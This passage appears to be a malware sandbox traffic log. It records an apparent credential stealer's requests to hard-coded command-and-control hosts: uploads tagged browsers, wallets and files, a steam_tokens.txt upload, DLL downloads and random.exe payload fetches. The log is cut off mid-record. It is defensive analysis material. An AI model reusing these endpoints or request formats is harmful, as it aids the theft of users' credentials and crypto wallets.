00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 45 33 36 38 37 44 39 46 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="hwid"0DE3687D9F0E1845150070------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="build"kira------AEHIDAKECFIEBGDHJEBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="message"browsers------IDHDGDHJEGHIDGDHCGCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 2d 2d 0d 0a Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="message"plugins------FBKJKEHIJECGCBFIJEGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 2d 2d 0d 0a Data Ascii: ------EBGCFBGCBFHJECBGDAKKContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------EBGCFBGCBFHJECBGDAKKContent-Disposition: form-data; name="message"fplugins------EBGCFBGCBFHJECBGDAKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: 185.215.113.115Content-Length: 5991Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKECHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 2d 2d 0d 0a Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file"------EHJDGCBGDBKJKFHIECBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFBHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 2d 2d 0d 0a Data Ascii: ------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="file"------HCGCAAKJDHJJJJJKKKFB--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDBAFHCAKFBGCBFHIJHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="message"wallets------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECAHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 2d 2d 0d 0a Data Ascii: ------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="message"files------DGDBAKKJKKECGDGCAECA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAEHJJJKJKFIDGCBGIHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 2d 2d 0d 0a Data Ascii: ------JECAEHJJJKJKFIDGCBGIContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------JECAEHJJJKJKFIDGCBGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JECAEHJJJKJKFIDGCBGIContent-Disposition: form-data; name="file"------JECAEHJJJKJKFIDGCBGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="message"ybncbhylepme------GCFIIEBKEGHJJJJJJDAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECAHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 65 30 30 31 37 32 35 61 65 36 65 32 63 62 31 36 65 33 37 36 62 38 63 30 32 64 33 34 34 37 64 31 36 30 30 62 35 33 33 35 63 30 63 37 64 62 63 33 64 38 37 31 64 39 62 61 62 65 62 64 62 65 30 64 38 36 65 30 39 66 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 2d 2d 0d 0a Data Ascii: ------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="token"be001725ae6e2cb16e376b8c02d3447d1600b5335c0c7dbc3d871d9babebdbe0d86e09ff------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HCGDGIDGIJKKEBGDAECA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 38 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062807001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /ZhnSMEmOyBahvsfTCosA1738232489 HTTP/1.1Host: home.fivegg5th.topAccept: /Content-Type: application/jsonContent-Length: 498678Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 33 30 32 37 38 34 37 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 